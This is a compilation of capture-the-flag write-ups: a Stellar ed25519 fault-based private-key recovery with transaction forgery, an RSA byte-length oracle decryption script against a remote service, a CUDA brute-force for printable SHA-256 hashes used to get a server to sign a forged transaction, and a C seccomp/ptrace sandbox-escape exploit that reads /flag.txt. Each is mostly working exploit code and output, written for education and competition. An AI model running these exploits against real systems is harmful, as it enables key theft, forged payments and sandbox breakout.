basekey = 'GCET4VA7665VKBXEY7TQKC64AJ4CZPWBTJ2IKKUSAGZXI5KHMKQL6N7Z'basepoint = ed25519.decodepoint(base64.b32decode(basekey)[1:-2])results = []for faultkey in ['GASPS2IITBNTPDPKYAKZ7XEMM7WFM267SWFI23CR6B24XRCOMU35OYVB','GD7AUFO3EIHLLUGIKOFBXYREVBCT66FQJSM5IGSEQETQX5KLDXRTEZJ3','GDXSGVIKLHLSZLZ7SNVPWNXTWYK2GQAVMPDVGB5Y72ESEFOP3MMDXXDO','GBZTJZAMFWBVD5ICNDBE5G6Q7HYGU4AFBBFB4TDUFIQW742NKHFNGWAI','GDV2JQXAGJ3UWC3UJWO4ZYM7E2NTD5TPPKOWV6PG46ZYF33PG5QUHX4B','GBTRIPZRA74R3BVVWOEWZIVNSOP7OFFS6BPGXSLK7KZ5EWYHNXM4QZI5','GBIPR4LONIFBGC43DBAGPTKES66TWB5GQIEMYHH3MPFIKRSAGH6A7LSW','GDMVFYLS4CWSEI6RW3YJNDV6DV36BQXSXDPTRYKRY3UQO64GJLTKMWYP','GBMT3463RD2J4AAE4S54ZIBR2LYPDAX6KCJ5DB4A3YLEUZDMUO5POV6R','GCH5OUNOQA5SOXVPTHNNIS3G46PJVZZMBXRLZFDRMXFKV52JCKWYOXZU','GAXOBBWLIXPOZFRXYBW7HIDWE2QQ6DI6ZDI3U3GVNY2GQZMYPCG3VBQR','GDY26KIEQJGF5LMZZMSW5PCACI22UTLRVNLTF3HGROOECFONYFEZF3LN','GAKE4IHQKZ77X67XRGHNK3OK4GVSMKCJOWM4TX7KB7GNRWL3TMMKLTY5','GCQZYKPIBESD7XUMRVOALOO7UI57WC4H7AODDYD62A2FLI32XV3ZSL6H','GDF6NHXIGCQ4U2ZS77Q4X7X7Q6D5IIWAFPHWHGSP3KDWVFQLQ3NJHIVK','GDXXXSYSTW5GV6JXC5K7JEPKL2YRAANNPWKGJ3AR55VELSPO42MHHVTN','GCJGWW76NYGVOLKFW6U74GMJI7MYNBS4S2FD3HHLXIRDP5GGM4LODGKR','GBCOTX4GQ3VTZCYM24TOEGX3O4NTD4WSGEEBK7GLSF5XYPJT3ZJ4PPST','GCML3R42IOVZ7ZFELLJCGV766D4SSL7CWAGM6YB7LV4ZGPWUDOLBLBQD','GDAHHDXFAEAAPQZIZCVEEFWPJFCWAMFHTAQPQQRU3W4IUL6K6SDGFZLW','GAS3DVITSEHP4R7QTDPPQLGCVIKWZ63X2JPSEVPTJMFJYGSJAIPEZ3K2','GDFRYLFO4MRKZQX722NOGHC22G5MA4ERJOIAUSO2TPAKXW7BHQHCCVSD','GCUPPCGW5CQ45KXY4A3DNNZSJTGHI6CRYXLOOJMPTK7AT6GWMALWAZY6','GCRD6S7KWAWNGTLSBK4K2VSL2KOIB2YHEFDTKY2IYJUUY4BHPYHZCW5W','GDLZRKDM5M6W4F5HEZ3XEYSXUTEE7ETDW6AN6FZJ4VI7G6Z3VQK36EJL','GDNATYJXRJRIP4FMN2RS7PHXVW7UOE4DVZOKJPCVTCFENP57DQGWO7GR','GASR6SEGRBS7JMVGJIRDU7VCJTZQSFQYVVWR6LVVZRWYNJ322TUBTTCJ','GA36VBVGF6AAXQZTR6ZJ5B42VCA3TQZEOCIOMKC6JH6SDF7RPPBHO5FF','GAOJM6HR6AIEYK45PSACEDZ5JA5SEIRIEGHU43XFXWUTGSWA6M6BYQPW','GDBQOSXNP4NKFAHGB5ADDQLCWC56AHQZXDHKZTUPIXHX6KXD2YCVKMJ6','GBBS374RPG55QYS73S4V32YDTFY5MLCSCOSYEUIXBSCGG4JKJYRLULLU','GCZR3XVMG5EDC5NGYAEKJPJSA37V7Y7YZGAUJORSPK2IHJD63DHUDRCJ',]: faultpoint = ed25519.decodepoint(base64.b32decode(faultkey)[1:-2]) diff = ed25519.edwards(basepoint, [ed25519.q-faultpoint[0], faultpoint[1]]) results.append(mapping[(diff[0],diff[1])])results.sort()assert all(results[i][0] == i for i in range(32))priv = bytes(results[i][1] for i in range(32))print(priv.hex())#print(ed25519.encodepoint(basepoint).hex())#print(ed25519.publickey(priv).hex())assert basepoint == ed25519.scalarmult(ed25519.B,int.from_bytes(priv,'little')+(1<<254))```
Step 3: sign something. ed25519 private key remains hidden behind the hash. Elliptic private key is sufficient for signing, but it has to be done manually rather than providing a secret to existing library (stellar_sdk very conveniently provides a method that adds an externally-calculated signature - it seems to be intended for some protocol feature rather than hacking, but works for our purposes too):```import stellar_sdkimport ed25519
pub = 'GCET4VA7665VKBXEY7TQKC64AJ4CZPWBTJ2IKKUSAGZXI5KHMKQL6N7Z'account = stellar_sdk.Account(account=pub, sequence=1)transaction = stellar_sdk.TransactionBuilder(source_account=account, network_passphrase=stellar_sdk.Network.PUBLIC_NETWORK_PASSPHRASE, base_fee=100).build()
h = bytes.fromhex('9082a0b5fa7848f1af878c241fd572bf20f8d28373fda96f05ea472fc0a4f735')message = transaction.hash()a = int.from_bytes(h, 'little') + 2**254r = ed25519.Hint(h[256//8:256//4] + message)R = ed25519.scalarmult(ed25519.B, r)S = (r + ed25519.Hint(ed25519.encodepoint(R) + base64.b32decode(pub)[1:-2] + message) * a) % ed25519.lsignature = ed25519.encodepoint(R) + ed25519.encodeint(S)
transaction.sign_hashx(signature)print(transaction.to_xdr())```
Step 4: submit the result to the server```curl -D - http://stellar-radiation.donjon-ctf.io:25519/submit -d 'tx=AAAAAgAAAACJPlQf97tVBuTH5wUL3AJ4LL7BmnSFKpIBs3R1R2KgvwAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAABf7GHxgAAAEAY1TioiU8UyPM1OP351UCHxmpPt4vfBHAB1zlgb5sKXBtNlpKP/YFO4qaJ4wnoCsRNbsnDGK36BqLnwcgloewL'```to obtain the flag `CTF{a035b4e7444f8d3660d6bdce44f5d40823a730a70a53e64fb54305ab9700a647}`. |
# HackTheBox University Qualifiers - Crypto - Oracle Leaks!
[Original Writeup](https://github.com/BeesAreCool/ctf-writeups/blob/main/writeups/htbuni_oracle_leaks.md)
## RSA Byte Length Oracle
Steam Technologies is a service provider which uses strictly steam-powered computers. They have recently developed a new type of oracle taking advantage of the steam-power architecture. They offer a huge price in case someone decrypts the message from their service. Are you up for the challenge?
## Triage
The summary of the challenge is we are given a prompt that allows us to access an rsa byte length decryption oracle. This is all done on a flag that is padded out to 127 bytes long, just short of the full 128.
```python def pad(self, pt): res = 0x02 << 8 * (self.n_size - 2) random_pad = os.urandom(self.n_size - 3 - get_length(pt)) for idx, val in enumerate(random_pad): if val == 0: val = 1 res += val << (len(random_pad) - idx + get_length(pt)) * 8 res += pt return res
def encrypt(self,pt): pt = bytes_to_long(pt) padded_pt = self.pad(pt) print(hex(padded_pt)) ct = pow(padded_pt, self.e, self.n) return long_to_bytes(ct).hex()```
As a quick note, for RSA we are able to multiply the plaintext by arbitrary values only by manipulating the ciphertext. This is because the public key is provided and the fact the following equation holds true `enc(a)*enc(b) = enc(a*b)`. Knowing this, we can check the byte length of plaintexts such as `pt*2` as well as `pt`.
This led to my plan of attack, we can determine the high bits of the plaintext by doing a binary search to multiply the plaintext by increasingly large numbers until it passes a certain length threshold. This doubles as essentially performing integer division. For instance, if we know that we can multiply the plaintext by 17 and it is 127 bytes long, but multiplying by 18 makes it 128 bytes long, we can figure out a range of possible values for the plaintext. In this example, it would be between `(2^128)/18 and (2^128)/17`. We can then attempt to find N divided by our value by calculating the range of possible values for `N/pt` and searching for a value that just barely rolls over N and leaves us with a byte-wise short value.
Additionally, one we know the approximate size of our plaintext, we can convert it into a different but related plaintext of relatively equal size. By attempting to find the smallest value X where `pt*x > N && pt * (x-1) < N` we will get a new plaintext qt where `qt = N % pt`. We can then recover the high bits of qt through the same process. Combining the values for high bits of qt and pt will allow us to recover more high bits of pt.
As a note, if pt was longer than 127 bytes we'd have to first blind the value to be shorter. However, we don't need to, so I won't cover that.
### Attack
After formulating the above attack I went about implementing it. First, searching for the largest value A that can be multiplied by the plaintext before resulting in a 128 byte decryption. Secondly, finding a value B that can be multiplied by the plaintext and gets the smallest value of B that results in a value larger than N. After getting these values and learning some bits of the plaintext, the plaintext is rolled around to a new value. This is all done using binary searches to minimize the number of oracle queries.
I eventually tweaked the value of B to allow for any result in a value between `N` and `N + 2^127` if such a value exists with an early exit. This reduced the number of oracle queries by around 20% and the math still worked.
Additionally, I implemented the flag recovery code. Making use of the fact that all the numbers found correspond to integer division, I simply reversed the process and walked through all the resulting plaintexts and their division to recover the flag.
Furthermore, I originally implemented a division operation that would search for common factors in the plaintext and use these to shrink the length of the plaintext. This resulted in significant query overhead so was removed.
```pythonfrom pwn import *import time
def int_to_bytes(val): plaintext = hex(val)[2:] if len(plaintext)%2 == 1: plaintext = "0"+plaintext return bytes.fromhex(plaintext)
#p = process(["python3", "chall.py"])p = remote("209.97.132.64", 32419)
started = p.recvuntil(">")p.sendline("1")p.recvuntil("(n,e): (")nums = p.recvline().decode("utf-8").replace(")","").replace(" ","").replace("'","")n, e = nums.split(",")n = int(n, 16)e = int(e, 16)#p.interactive()p.recvuntil(">")p.sendline("2")p.recvuntil("Encrypted text:")text = p.recvline()text = text.decode("utf-8").strip()ct = int(text, 16)start = time.time()
cached = dict()queries = 0
#This tests a number and gets the value for its decrypted lengthdef test_num(x): global cached global queries if x in cached: print("CACHED!") return cached[x] p.sendline("3") to_send = x p.sendline(int_to_bytes(x).hex()) p.recvuntil("Length:") length = int(p.recvline().decode("utf-8").strip()) cached[x] = length queries += 1 return length #This searches for a small value that just barely rolls over N#Note, sometimes it isn't actually the smallest value, for some reason it does less queries this way/def base_divide(x): byte_size = test_num(x) maximum = 0 print("Queries start of base divide", queries) for i in range(int((127-byte_size)*8), 10000): test =(pow(int(2**i), e, n) * x) % n #print(test, i, 2**i) #print() maximum = 2 ** i if test_num(test) == 128: break print(maximum) bottom = maximum//2 top = maximum print("Queries end of find offset", queries) print(bottom, top) while top > bottom + 1: mid = (top + bottom) // 2 #print(bottom, top, mid) test = (pow(mid, e, n) * x) % n if test_num(test) == 128: top = mid - 1 else: bottom = mid + 1 print(bottom, top, mid) answer = 0 print("Queries mid find N range", queries) for i in range(top, bottom-2, -1): test = (pow(i, e, n) * x) % n print(test_num(test), byte_size) if test_num(test) == 127: answer = i break print("Queries end find N range", queries) print(i) lowest = (256**127) // (answer+1) highest = ((256**127) // answer) + 1 print(hex(lowest)) print(hex(highest)) ndiv_low = n // highest ndiv_hi = n // lowest + 1 bottom = ndiv_low top = ndiv_hi print("N RANGED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!") print(bottom, top) while top > bottom + 1: mid = (top + bottom) // 2 test = (pow(mid, e, n) * x) % n print(bottom, top, mid, byte_size, test_num(test)) if test_num(test) < 128: top = mid - 1 if test_num(test)<127: print("early exit", queries) return mid, test else: bottom = mid + 1 print(bottom, top) print("Queries end find final", queries) answer = 0 for i in range(bottom, top+3): test = (pow(i, e, n) * x) % n print(bottom, top, mid, byte_size, test_num(test)) if test_num(test) <= byte_size: answer = i print("Queries end divide", queries) return answer, test
print(n, e)print(text)pathed = []multiples = []for z in range(60): mul1, ct = (1, ct) pathed.append(ct) mul2, ct = base_divide(ct) pathed.append(ct) multiples.append((mul1, mul2)) #This performs the reconstruction of the original plaintext after finding a small value to multiply by pt and the high bits of pt print("="*100, test_num(ct)) if test_num(ct) < 64: break minimum = n//multiples[-1][1] maximum = n//(multiples[-1][1] - 1) minimum *= multiples[-1][0] maximum *=multiples[-1][0] print("-"*100) for a, b in reversed(multiples[:-1]): minimum = (n + minimum)// b maximum = (n + maximum)// b + 1 minimum *= a maximum *= a print(hex(minimum)) print(hex(maximum)) print(bytes.fromhex("0"+hex(minimum)[2:])) matched = 0 for i in range(len(hex(minimum))): if hex(minimum)[i] == hex(maximum)[i]: matched += 1 else: break print("-"*100, 1050*((time.time() - start)/queries), matched) if minimum +2 > maximum: break#print(trial_reduce(ct))```
We now have the flag!
```----------------------------------------------------------------------------------------------------0x21ae02dff835a73e90b2256c4dc5a303f58861134fe9146df3860d0946f543b3dedd8e23c388f5022274113d2728065f7bde6b9266b5620859491cdb01dd11d88fe76ebdcad44d0ec7fbf207216c69156d37e004854427b6d346e673372355f34747434636b5f31355f633030315f346e645f756e64337276346c7533647c0x21ae02dff835a73e90b2256c4dc5a303f58861134fe9146df3860d0946f543b3dedd8e23c388f5022274113d2728065f7bde6b9266b5620859491cdb01dd11d88fe76ebdcad44d0ec7fbf207216c69156d37e004854427b6d346e673372355f34747434636b5f31355f633030315f346e645f756e64337276346c7533647db'\x02\x1a\xe0-\xff\x83Zs\xe9\x0b"V\xc4\xdcZ0?X\x86\x114\xfe\x91F\xdf8`\xd0\x94oT;=\xed\xd8\xe2<8\x8fP"\'A\x13\xd2r\x80e\xf7\xbd\xe6\xb9&kV \x85\x94\x91\xcd\xb0\x1d\xd1\x1d\x88\xfev\xeb\xdc\xadD\xd0\xec\x7f\xbf r\x16\xc6\x91V\xd3~\x00HTB{m4ng3r5_4tt4ck_15_c001_4nd_und3rv4lu3d|'---------------------------------------------------------------------------------------------------- 297.01129338534476 254
```
As a note, this script actually fails to correctly get the very last bit of the flag. I assume I have an off by one error somewhere, but I can't really be bothered to fix it at this time. |
```#!/usr/bin/env pythonimport osimport string
from aiohttp import webfrom stellar_sdk import ( Keypair, Account, TransactionBuilder, Asset, Network, TransactionEnvelope,)from stellar_sdk.exceptions import BadSignatureError
app = web.Application()routes = web.RouteTableDef()
STELLAR_SECRET = os.environ.get("STELLAR_SECRET")FLAG = os.environ.get("FLAG")if STELLAR_SECRET is None or FLAG is None: raise EnvironmentError("Secrets are not set")
# Disabled for now# @routes.post("/prepareorder")async def prepare_order(request: web.Request): data = await request.post() if "address" not in data: return web.Response(status=500, body="Missing destination address")
keypair = Keypair.from_secret(STELLAR_SECRET) account = Account(account=keypair.public_key, sequence=1)
transaction = ( TransactionBuilder( source_account=account, network_passphrase=Network.PUBLIC_NETWORK_PASSPHRASE, base_fee=100, ) .append_payment_op( data["address"], Asset("PIZZA", keypair.public_key), "1" ) .build() ) transaction.sign(keypair) return web.Response(body=transaction.to_xdr())
@routes.post("/submit")async def submit_transaction(request: web.Request): data = await request.post() if "tx" not in data: return web.Response(status=500, body="Missing tx") envelope = TransactionEnvelope.from_xdr( data["tx"], Network.PUBLIC_NETWORK_PASSPHRASE ) if len(envelope.signatures) != 1: return web.Response(status=500, body="Invalid envelope") keypair = Keypair.from_secret(STELLAR_SECRET) try: keypair.verify(envelope.hash(), envelope.signatures[0].signature) except BadSignatureError: return web.Response(status=500, body="Invalid signature") # server = Server(horizon_url="https://horizon.stellar.org") # response = server.submit_transaction(envelope) # return response["flag"] return web.Response(body=FLAG)
MAX_PROOF_SIZE = 32MAX_TRIES = 30
@routes.post("/publickey")async def public_key(request: web.Request): data = await request.post() public_keys = set()
# Detect Stellar radiations for _ in range(MAX_TRIES): public_keys.add(Keypair.from_secret(STELLAR_SECRET).public_key) if len(public_keys) > 1: return web.Response(status=500)
sk = Keypair.from_secret(STELLAR_SECRET).signing_key if "proof" in data: # Sign a short "proof" message so that client can verify public key is valid, # in case previous check was not enough. # Proof must be short, printable messages. proof = data["proof"] if len(proof) > MAX_PROOF_SIZE or not all(c in string.printable for c in proof): return web.Response(status=500, body="Invalid proof requested") signed_message = sk.sign(proof.encode()) return web.json_response( { "public_key": public_keys.pop(), "signature": signed_message.signature.hex(), } ) else: return web.json_response({"public_key": public_keys.pop()})
@routes.get("/")async def index(request): return web.FileResponse("./index.html")
if __name__ == "__main__": app.add_routes(routes) web.run_app(app, port=25520)```
The task starts as a continuation of Part 1, but the solution is really different. Faulty public keys are gone, but the server now agrees to sign anything with its private key, as long as "anything" is <= 32 bytes and consists only of what Python means by `string.printable` (that is, normal printable ASCII from 0x20 to 0x7E inclusive, plus five characters from 9 to 0xD, 100 characters total). Normal signing process in Stellar involves sha256-hashes that are exactly 32-bytes long (no problem here) but are usually not printable. However, nothing in sha-256 forbids printable hashes. Probability for a random 32-byte string to be printable is `(100/256)**32`, and sha-256 outputs are not that different from random strings, so one should expect to get a printable hash after `2.56**32=1.16e13` attempts on average.
Step 1: generate a template for signing where some bytes can be varied while remaining a valid message. I have used the following (public key is taken from the server):```import stellar_sdktransaction=stellar_sdk.TransactionBuilder(source_account=stellar_sdk.Account('GDN72GVC6ACLLR4NOW5HH5H54JB34QMCXORYE3ZBYSRRJOBO32EX5HAY', sequence=0xCCCCCCCCCCCCCCCC), network_passphrase=stellar_sdk.Network.PUBLIC_NETWORK_PASSPHRASE, base_fee=100).build()print(transaction.signature_base().hex())```Placeholder 0xCC...CC is transformed to bytes CC ... CD which means that it is incremented before building.
Step 2: unleash the power of GPU:```#include "cuda_runtime.h"#include "device_launch_parameters.h"
#include <stdio.h>#include <stdint.h>
static const __constant__ unsigned char data[128] = { // actual data 0x7A,0xC3,0x39,0x97,0x54,0x4E,0x31,0x75,0xD2,0x66,0xBD,0x02,0x24,0x39,0xB2,0x2C, 0xDB,0x16,0x50,0x8C,0x01,0x16,0x3F,0x26,0xE5,0xCB,0x2A,0x3E,0x10,0x45,0xA9,0x79, 0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0xDB,0xFD,0x1A,0xA2,0xF0,0x04,0xB5,0xC7, 0x8D,0x75,0xBA,0x73,0xF4,0xFD,0xE2,0x43,0xBE,0x41,0x82,0xBB,0xA3,0x82,0x6F,0x21, 0xC4,0xA3,0x14,0xB8,0x2E,0xDE,0x89,0x7E,0x00,0x00,0x00,0x00,0xCC,0xCC,0xCC,0xCC, 0xCC,0xCC,0xCC,0xCC,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00, // padding 0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x20,};
static const __constant__ uint32_t dev_k[64] = { 0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5,0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5, 0xd807aa98,0x12835b01,0x243185be,0x550c7dc3,0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174, 0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc,0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da, 0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7,0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967, 0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13,0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85, 0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3,0xd192e819,0xd6990624,0xf40e3585,0x106aa070, 0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5,0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3, 0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208,0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2};
struct SHA256_CTX { uint32_t state[8];};
#define ROTLEFT(a,b) (((a) << (b)) | ((a) >> (32-(b))))#define ROTRIGHT(a,b) (((a) >> (b)) | ((a) << (32-(b))))
#define CH(x,y,z) (((x) & (y)) ^ (~(x) & (z)))#define MAJ(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z)))#define EP0(x) (ROTRIGHT(x,2) ^ ROTRIGHT(x,13) ^ ROTRIGHT(x,22))#define EP1(x) (ROTRIGHT(x,6) ^ ROTRIGHT(x,11) ^ ROTRIGHT(x,25))#define SIG0(x) (ROTRIGHT(x,7) ^ ROTRIGHT(x,18) ^ ((x) >> 3))#define SIG1(x) (ROTRIGHT(x,17) ^ ROTRIGHT(x,19) ^ ((x) >> 10))
__host__ __device__ void sha256_loadbytes(uint32_t* m, size_t datapos){ uint32_t i, j;#pragma unroll 16 for (i = 0, j = 0; i < 16; ++i, j += 4) m[i] = (data[datapos + j] << 24) | (data[datapos + j + 1] << 16) | (data[datapos + j + 2] << 8) | (data[datapos + j + 3]);}
__host__ __device__ void sha256_transform(SHA256_CTX* ctx, uint32_t m[64]){ uint32_t a, b, c, d, e, f, g, h, i, t1, t2;
#pragma unroll 64 for (i = 16; i < 64; ++i) m[i] = SIG1(m[i - 2]) + m[i - 7] + SIG0(m[i - 15]) + m[i - 16];
a = ctx->state[0]; b = ctx->state[1]; c = ctx->state[2]; d = ctx->state[3]; e = ctx->state[4]; f = ctx->state[5]; g = ctx->state[6]; h = ctx->state[7];
#pragma unroll 64 for (i = 0; i < 64; ++i) { t1 = h + EP1(e) + CH(e, f, g) + dev_k[i] + m[i]; t2 = EP0(a) + MAJ(a, b, c); h = g; g = f; f = e; e = d + t1; d = c; c = b; b = a; a = t1 + t2; }
ctx->state[0] += a; ctx->state[1] += b; ctx->state[2] += c; ctx->state[3] += d; ctx->state[4] += e; ctx->state[5] += f; ctx->state[6] += g; ctx->state[7] += h;}
__global__ void kernel(SHA256_CTX* afterfirst, uint32_t* state, uint32_t upper){ uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t m[64]; sha256_loadbytes(m, 64); m[3] = upper; uint32_t i, j; for (uint32_t tmp = 0; tmp < 65536; tmp++) { m[4] = (x << 16) | tmp; SHA256_CTX ctx = *afterfirst; sha256_transform(&ctx, m); bool good = true;#pragma unroll 8 for (i = 0; i < 8; i++) {#pragma unroll 4 for (j = 0; j < 4; j++) { unsigned char b = (ctx.state[i] >> (8 * j)) & 0xFF; if (b < 9 || b > 13 && b < 32 || b > 126) good = false; } } if (good) { // hypothetically racy but whatever state[0] = 1; state[1] = m[4]; } }}
int main(){ SHA256_CTX afterfirst; afterfirst.state[0] = 0x6a09e667; afterfirst.state[1] = 0xbb67ae85; afterfirst.state[2] = 0x3c6ef372; afterfirst.state[3] = 0xa54ff53a; afterfirst.state[4] = 0x510e527f; afterfirst.state[5] = 0x9b05688c; afterfirst.state[6] = 0x1f83d9ab; afterfirst.state[7] = 0x5be0cd19; { uint32_t m[64]; sha256_loadbytes(m, 0); sha256_transform(&afterfirst, m); } uint32_t state[2] = { 0,0 };
cudaError_t cudaStatus; SHA256_CTX* afterfirst_device = NULL; uint32_t* state_device = NULL;
// Choose which GPU to run on, change this on a multi-GPU system. cudaStatus = cudaSetDevice(0); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaSetDevice failed! Do you have a CUDA-capable GPU installed?"); goto Error; }
// Allocate GPU buffers cudaStatus = cudaMalloc((void**)&afterfirst_device, sizeof(SHA256_CTX)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; }
cudaStatus = cudaMalloc((void**)&state_device, 2 * sizeof(uint32_t)); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMalloc failed!"); goto Error; }
// Copy input from host memory to GPU buffers. cudaStatus = cudaMemcpy(afterfirst_device, &afterfirst, sizeof(SHA256_CTX), cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; }
cudaStatus = cudaMemcpy(state_device, state, 2 * sizeof(uint32_t), cudaMemcpyHostToDevice); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; }
for (uint32_t upper = 0;; upper++) { printf("."); fflush(stdout); // Launch a kernel on the GPU with one thread for each element. kernel<<<256, 256>>> (afterfirst_device, state_device, upper);
// Check for any errors launching the kernel cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); goto Error; }
// cudaDeviceSynchronize waits for the kernel to finish, and returns // any errors encountered during the launch. cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize returned error code %d after launching addKernel!\n", cudaStatus); goto Error; }
// Copy output from GPU buffer to host memory. cudaStatus = cudaMemcpy(state, state_device, 2 * sizeof(uint32_t), cudaMemcpyDeviceToHost); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaMemcpy failed!"); goto Error; }
if (state[0]) { printf("found! lower=0x%X upper=0x%X\n", state[1], upper); break; } }
Error: cudaFree(state_device); cudaFree(afterfirst_device); // cudaDeviceReset must be called before exiting in order for profiling and // tracing tools such as Nsight and Visual Profiler to show complete traces. cudaStatus = cudaDeviceReset(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceReset failed!"); }
return 0;}````cuda_runtime.h` and `device_launch_parameters.h` were inserted by CUDA template for Visual Studio (most comments are from that template as well, for that matter), I haven't bothered to check what exactly they do. I'm not an expert in CUDA programming, so it's possible that something could be better. With this code, my notebook has found a good value for placeholder (0x73F81EF581F) in about three hours.
Step 3: generate the transaction with the value from Step 2 (if you also have used sequence as placeholder, watch for off-by-one), get the hash and make sure it is printable, send it to the server to sign, enter the signature:```>>> import stellar_sdk>>> transaction=stellar_sdk.TransactionBuilder(source_account=stellar_sdk.Account('GDN72GVC6ACLLR4NOW5HH5H54JB34QMCXORYE3ZBYSRRJOBO32EX5HAY', sequence=0x73F81EF581E), network_passphrase=stellar_sdk.Network.PUBLIC_NETWORK_PASSPHRASE, base_fee=100).build()>>> transaction.hash()b'XM>iUQ9i9~b[*nT{x3!<Rpt \x0c@o0XBj@'``````$ curl http://stellar-radiation.donjon-ctf.io:25520/publickey -d 'proof=XM>iUQ9i9~b[*nT{x3!<Rpt%20%0C@o0XBj@'{"public_key": "GDN72GVC6ACLLR4NOW5HH5H54JB34QMCXORYE3ZBYSRRJOBO32EX5HAY", "signature": "712559aa2c9b17a3b59747582238d1b729b283e785685b48304d0c59ff148396fe8df2be4639416c90108baebc5b7b2c1d1f3cc1af0d5bef502f18c95ad95c0b"}``````>>> transaction.sign_hashx("712559aa2c9b17a3b59747582238d1b729b283e785685b48304d0c59ff148396fe8df2be4639416c90108baebc5b7b2c1d1f3cc1af0d5bef502f18c95ad95c0b")>>> transaction.to_xdr()'AAAAAgAAAADb/Rqi8AS1x411unP0/eJDvkGCu6OCbyHEoxS4Lt6JfgAAAAAAAAc/ge9YHwAAAAAAAAAAAAAAAAAAAAAAAAABfnV9SwAAAEBxJVmqLJsXo7WXR1giONG3KbKD54VoW0gwTQxZ/xSDlv6N8r5GOUFskBCLrrxbeywdHzzBrw1b71AvGMla2VwL'``````$ curl http://stellar-radiation.donjon-ctf.io:25520/submit -d 'tx=AAAAAgAAAADb/Rqi8AS1x411unP0/eJDvkGCu6OCbyHEoxS4Lt6JfgAAAAAAAAc/ge9YHwAAAAAAAAAAAAAAAAAAAAAAAAABfnV9SwAAAEBxJVmqLJsXo7WXR1giONG3KbKD54VoW0gwTQxZ/xSDlv6N8r5GOUFskBCLrrxbeywdHzzBrw1b71AvGMla2VwL'CTF{83dd5abec4185700d031420395059819c909bda66e4aab78c8963002935832b7}``` |
Full solution [here](https://github.com/TheMaccabees/ctf-writeups/blob/master/hxpCTF2021/%E6%97%A5%E6%9C%AC%E6%97%85%E8%A1%8C/solution/).
```#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <unistd.h>#include <sys/syscall.h>
// Fix VSCode being annoying..#ifndef AT_FDCWD#define AT_FDCWD -100#endif /* AT_FDCWD */
// Definitions#define STDOUT_FD (1)#define MAX_FLAG_SIZE (256)
// Exploit for hxpCTF2021 / 日本旅行:// (inspired by https://gist.github.com/pqlx/bfb932c96b5d8805a6f1781ae2865993 - Thx!)// // We need to somehow "escape" the seccomp/ptrace jail and read the flag file// under '/flag.txt'.// The main thing preventing us from straight up reading the file is the fact// that our "host" (tracer) waits on every syscall we make, and if it is one// of "open"/"openat" - it canonializes the path and sanitizes it.// // The vulnerability is in the path validation flow - when the tracer validates the// open/openat path, it accidentally calls "ptrace(PTRACE_SYSCALL, stop->pid, NULL, NULL);"// twice (once at 'handle_syscall()', and right afterwards at ST_SYSCALL flow at "guardian()").// Usually, the second call to ptrace fails with ESRCH and everything is fine.// But, if after the first PTRACE_SYSCALL call, our tracee calls another syscall,// we get a PTRACE_SYSCALL on syscall-entry - without filtering! (Practically - we de-sync// the 'proc->in_syscall' state).// This allows us to call 'openat("/flag.txt")' without path filtering, and thus// to read the flag!//int main(void){ // Exploit host path filtering in order to open '/flag.txt' file int flag_fd = -1; do { flag_fd = syscall(__NR_openat, AT_FDCWD, "/flag.txt", O_RDONLY); } while (flag_fd == -1); // Read out the flag to stdout syscall(__NR_sendfile, STDOUT_FD, flag_fd, NULL, MAX_FLAG_SIZE);
// Bye-bye! syscall(__NR_exit, 0);}``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.